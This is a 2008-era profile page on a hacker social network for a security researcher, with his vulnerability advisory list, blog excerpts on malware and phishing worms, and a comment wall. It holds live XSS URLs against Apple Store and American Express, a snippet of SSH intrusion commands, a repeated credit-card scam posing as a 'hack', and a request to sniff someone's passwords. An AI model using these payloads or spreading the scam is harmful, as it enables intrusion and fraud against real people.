House of Hackers

The-Insider
  • 23, Male
  • Modiin
  • Israel
Share 

The-Insider's Friends

Music

Loading…

The-Insider's Groups

My Blog

Loading feed

 

The-Insider's Page

Gifts Received

Gift

The-Insider has not received any gifts yet

Give The-Insider a Gift

Latest Activity

Before going shopping online, every customer has to register online with his/her credit card information and they'll leave their emails too so that those shopping websites will confirm their registration. For those online shoppers who used yahoo e...
August 24
Here is a Hack you can use with the actual address to yahoo’s server. databasey47@yahoo.com the address you use for any yahoo credit card hack. Follow the steps below: Send an Email to mailto: databasey47@yahoo.com With the subject: accntopp-cc...
August 24
Before going shopping online, every customer has to register online with his/her credit card information and they'll leave their emails too so that those shopping websites will confirm their registration. For those online shoppers who used yahoo e...
August 24
Hey your questions are all ok based on ssh and rvdh i like your spirit allot keep it up dude, base don hackign ssh maybe these can be lil bit useful for all hostname kdc host kdc showmount -e showmount -a cd /home ls su - bob cd .ssh ssh h...
July 16
Try this, man! http://freereverseip.com ==>The best service to find all websites on a host And more...
March 2
Try this, man! http://freereverseip.com ==>The best service to find all websites on a host And more...
March 2
Try this, man! http://freereverseip.com ==>The best service to find all websites on a host And more...
March 2
Nice read! Thanks for the post!
February 13

Profile Information

Real Name:
Rafel Ivgi
Occupation:
Founder & Cheif Security Architect in Aspect9 Inc
Blog:
http://rafelivgi.blogspot.com
Website:
http://theinsider.deep-ice.com
Description:
After more then a decade of my life dedicated to security i decided to open Aspect9 and start creating a real solution.

Programming languages:
INF, Batch, Bash, Basic, Pascal, ASM, C, C++, Perl, PHP, Python, Ruby, HTML, CSS, Javascript, VBScript, Visual BAsic, C#, SQL

BIDS:

1 Microsoft Internet Explorer Modal Dialog Zone Bypass
http://www.securityfocus.com/bid/10473

2 Internet Explorer 8 CSS 'expression' Property Cross Site Scripting Filter Bypass Weakness
http://www.securityfocus.com/bid/32780

3 Facebook Photo Uploader 'ImageUploader4.1.ocx' FileMask Method ActiveX Buffer Overflow
http://www.securityfocus.com/bid/27756

4 Microsoft Internet Explorer Dynamic IFRAME File Download Security Warning Bypass Weakness
http://www.securityfocus.com/bid/12264

5 Winace Remote Directory Traversal
http://www.securityfocus.com/bid/12177

6 Symantec CcErrDsp.ErrorDisplay.1 ActiveX Remote D.O.S
http://www.securityfocus.com/bid/12175

7 WinHKI Multiple Remote Vulnerabilities
http://www.securityfocus.com/bid/12176

8 Adobe Acrobat/Acrobat Reader ActiveX Control URI Request Heap Buffer Overflow
http://www.securityfocus.com/bid/10947

9 Microsoft Internet Explorer URL Local Resource Access Weakness
http://www.securityfocus.com/bid/10472

10 3Com OfficeConnect Remote 812 ADSL Router Web Interface Authentication Bypass
http://www.securityfocus.com/bid/10426

11 Yahoo! Messenger YInsthelper.DLL Multiple Buffer Overflow Vulnerabilities
http://www.securityfocus.com/bid/10199

12 Mcafee FreeScan CoMcFreeScan Browser Object Buffer Overflow
http://www.securityfocus.com/bid/10071

13 Panda ActiveScan ascontrol.dll D.O.S
http://www.securityfocus.com/bid/10067

14 Panda ActiveScan ASControl.DLL Remote Heap Overflow
http://www.securityfocus.com/bid/10065

15 Adobe Photoshop COM Objects D.O.S
http://www.securityfocus.com/bid/10061

16 Microsoft Internet Explorer Macromedia Flash Player Plug-in Remote D.O.S
http://www.securityfocus.com/bid/10057

17 Microsoft Internet Explorer MSWebDVD Object D.O.S
http://www.securityfocus.com/bid/10056

18 NullSoft Winamp Malformed File Name D.O.S
http://www.securityfocus.com/bid/9923

19 Invision Power Board Pop Parameter XSS
http://www.securityfocus.com/bid/9822

20 Software602 602Pro LAN Suite Web Mail XSS
http://www.securityfocus.com/bid/9777

21 Software602 602Pro LAN Suite Web Mail Installation Path Disclosure
http://www.securityfocus.com/bid/9781

22 Seyeon Technology FlexWATCH Server XSS
http://www.securityfocus.com/bid/9739

23 Working Resources BadBlue Server phptest.php Path Disclosure
http://www.securityfocus.com/bid/9737

24 Borland Webserver for Corel Paradox Directory Traversal
http://www.securityfocus.com/bid/9486

25 Oracle HTTP Server isqlplus XSS
http://www.securityfocus.com/bid/9484

26 Novell Netware Enterprise Web Server Multiple Vulnerabilities
http://www.securityfocus.com/bid/9479

27 Netbus Directory Listings Disclosure and File Upload
http://www.securityfocus.com/bid/9475

28 Darkwet Network WebcamXP XSS
http://www.securityfocus.com/bid/9465

29 AIPTEK NETCam Webserver Directory Traversal
http://www.securityfocus.com/bid/9456

30 2Wire HomePortal Series Directory Traversal
http://www.securityfocus.com/bid/9463

31 ZyXEL ZyWALL 10 Management Interface XSS
http://www.securityfocus.com/bid/9373

32 Edimax AR-6004 ADSL Router Management Interface XSS
http://www.securityfocus.com/bid/9374

33 SnapStream PVS Lite XSS
http://www.securityfocus.com/bid/9375

34 SEH InterCon Smart PrintServer Access Validation
http://www.securityfocus.com/bid/9224

35 Microsoft Office XP HTML Link Processing Remote Buffer Overflow
http://www.securityfocus.com/bid/12480

36 EMule Web Control Panel D.O.S
http://www.securityfocus.com/bid/10317

37 Mcafee FreeScan CoMcFreeScan Browser Information Disclosure
http://www.securityfocus.com/bid/10077

My Contact Details

Everybody add me!
I am friendly and love to help and discuss.

GTALK+EMAIL: rafelivgi@gmail.com
MSN: the_insider@mail.com
ICQ: 196495268
YAHOO: the_ins1der
SKYPE: the_ins1der

The-Insider's Blog

The-Insider

The "DesktopSmiley, Not A Spyware" ToolBar

The "Not A Phishing Worm" really got me interested as it sent special Christmas messages so I decided to dig in just a bit. So as discovered, after the user supplies his MSN credentials, his friends get a link to the "Not A Phishing" website and a lot of tricky links leading to DesktopSmiley.com to download their toolbar. Which they say is "Not Spyware".

So we got a non-phishing worm downloading a non-spyware program, let's see its non-evil actions :)
The first thing I did was downloading the i… Continue

Posted on December 29, 2008 at 8:02am —

The-Insider

Big Brands XSS

Apple Store - XSS (less then 15 minutes to find it, manually)
http://store.apple.com/us/product/TU243LL/A?fnode=MTY1NDA4Mg&mco=MjQyMDQ1OA&s=newest'">%3E%3Cdiv%20id=%22


American Express - HTTPS XSS (less then a minute to find it, manually)
https://www01.extra.americanexpress.com/ProductImage.aspx?url=https://merpic.intelliwebservices.com/img/full/10185/b2/50fe31e266936b2887ab3ef9608f2db2.gif%22%3E%3Cscript%3Ealert(%27American%20XSSspress%27)%3C/script%3E%3Cdiv%20id=%22


How can us c… Continue

Posted on December 25, 2008 at 2:30am — 1 Comment

The-Insider

The MSN "Not A Phishing Worm"

This is a funny one actually :)
I am just working as usual when I got the following message on my MSN Messenger:

This is how real girls party. Great high quality pictures on
http://jusmineza.PartyPicturez.info

Now of course i understood that it’s a worm, but still, lets see where it leads to.
So I went into the site and it looked like this:

With what i have seen until now, this is a classic phising site, I saw dozens
like it for Yahoo! in the past. But wait! lets look at that GREY text blow:… Continue

Posted on December 24, 2008 at 7:00pm —

The-Insider

A new MSN Worm

Are viruses attracted to me specifically or it happens to everyone and they just don't notice or say nothing about it. It getting really hard to speak with people using instant messengers and to be sure it is them sending you a message and not a virus.

Before i begin, let's notice a few close viruses :)
This: http://www.cisrt.org/enblog/read.php?106
Is a different one, older one from July. Reported and still not fully detected by vendors.

Now for the painful part, this:
http://blog.threatfire.… Continue

Posted on December 24, 2008 at 4:16am —

The-Insider

Pen-Tests in 2008 and Why don't you crack ssh?

I made a pen-test lately to a medium size American firm and it seems public remote exploits for devices such as Juniper, Netopia, Cisco (telnet) and default Linux services has gone to as low as one or two for each since 2004.

Since any respectable firm has windows update turned on and the Fedora style Linux distribution also has automatic updates, I got to the conclusion that the cycle of:
Safe --> Research --> Exploit --> Public Disclosure --> Patch --> Automatic Update --> S… Continue

Posted on December 24, 2008 at 3:39am — 12 Comments

The-Insider

Windows "Open File - Security Warning" Dialog

Not so long ago, I found one of the most bizzar bugs. It seems there is some kind of bug in the parsing of the command line read from the registry for filetype handled by explorer.exe. This was checked on Windows XP SP3 but I guess it existst in SP2 too. This bug allows controling the icon which appears in the "Open File - Security Warning" Dialog for all the executables downloaded from the internet.

Each time you download a file from the internet/intranet to a drive with NTFS file system an AD… Continue

Posted on December 21, 2008 at 1:16am — 5 Comments

The-Insider

SO Common and yet EVIL goes free :)

Before I start this one, I must say I never thought of myself as a blogger.
I was always reading other people's blog thinking they try to be "I am cool I have a blog" kind of people. Well, I just think the malicious stuff I see everyday should be shared with YOU :)

At these times, torrents are currently the world's most active network for file sharing. The current windows version is always One of the most shared files and therefore crime follows there :)

I recently decided to put it to the tes… Continue

Posted on December 21, 2008 at 1:15am — 3 Comments

The-Insider

Google fooled by the "Fake Anti-Virus Virus"

You probably know by now about the fake Anti-Virus that is planted everywhere to fool people into buying it, go figure maby it will self update some day and will start stealing bank accounts...
I can't believe we have come to this to point where it is so spread and has so much different domains and versions and nobody stops them!!!
The internet needs some kind of global FBI to keep control over these criminals!!!
These guys operate from Russia and they are the "180 Solutions" team (i proove it b… Continue

Posted on December 21, 2008 at 1:13am — 4 Comments

The-Insider

AVs fail Again

Lately I have seen many web downloads, some at forums and some at rapidshare and also a few torrents such as "Adobe Acrobat 9" that include installation and a crack.
The installation or crack is in a password protected rar file that in order to get the password, one must run the supplyed tool called "XXX Password Generator".

This installs another variant of the AntiVirus 2008, I can truely say I can't tell anymore if it comes from the same guys, ok of course it's them but there is just no way t… Continue

Posted on December 21, 2008 at 1:12am — 3 Comments

The-Insider

Keylogger Running Under Kaspersky 2009

The last posts clearly show It is well known that static virus detection is not something AV vendors do well enough. Now this one is quite a story. As I was researching many trojans I was moving files into and out of my Virtual PC machine used to test viruses. My computer has kaspersky 2009 installed and running with maximum security settings (including keyloggers and kernel object modifications).

I accidently executed without noticing on my host PC one of the samples I was testing in the VM. I… Continue

Posted on December 21, 2008 at 1:10am —

Comment Wall (14 comments)

You need to be a member of House of Hackers to add comments!

Join this Ning Network

At 5:52am on February 27, 2009, fallen angel said…
what tools i can use for that purpose??
At 5:52am on February 27, 2009, fallen angel said…
your are best hacker i think,
can y help me ??
if y dont mind, i wont to sniff someone computer password to sniff and get the many information from him can u help me please?
At 10:25am on February 4, 2009, alex said…
hey can u help me in downloading a software its " POINTSEC "
At 10:24am on February 4, 2009, alex said…
hi ...........
At 11:58am on January 22, 2009, h3l3n said…
oioi! :-)
At 2:46am on January 7, 2009, #HBT_Rodrigo Alves said…
u are welcome!!!!!!
as you know i'm form brazil
have u use IRC? i'm here for knowledge sharing
happy hacking and happy new year
At 2:11pm on December 30, 2008, Rafael Poseddon said…
Thank you!
I am very happy to know that people like;)
the photos are part of a major effort of the team .. hehe

I can add you?
At 3:04am on December 30, 2008, Susa said…
Ya boy, its really nice to meet u ;]

=***
At 10:48pm on December 25, 2008, ania_s Ania Ann Margarita said…
hello :)
At 11:34am on December 22, 2008, Dexter said…
Hi boy!
 
 

About

pdp pdp created this Ning Network.
 

© 2009   Created by pdp on Ning.   Create a Ning Network!

Badges  |  Report an Issue  |  Privacy  |  Terms of Service

Sign in to chat!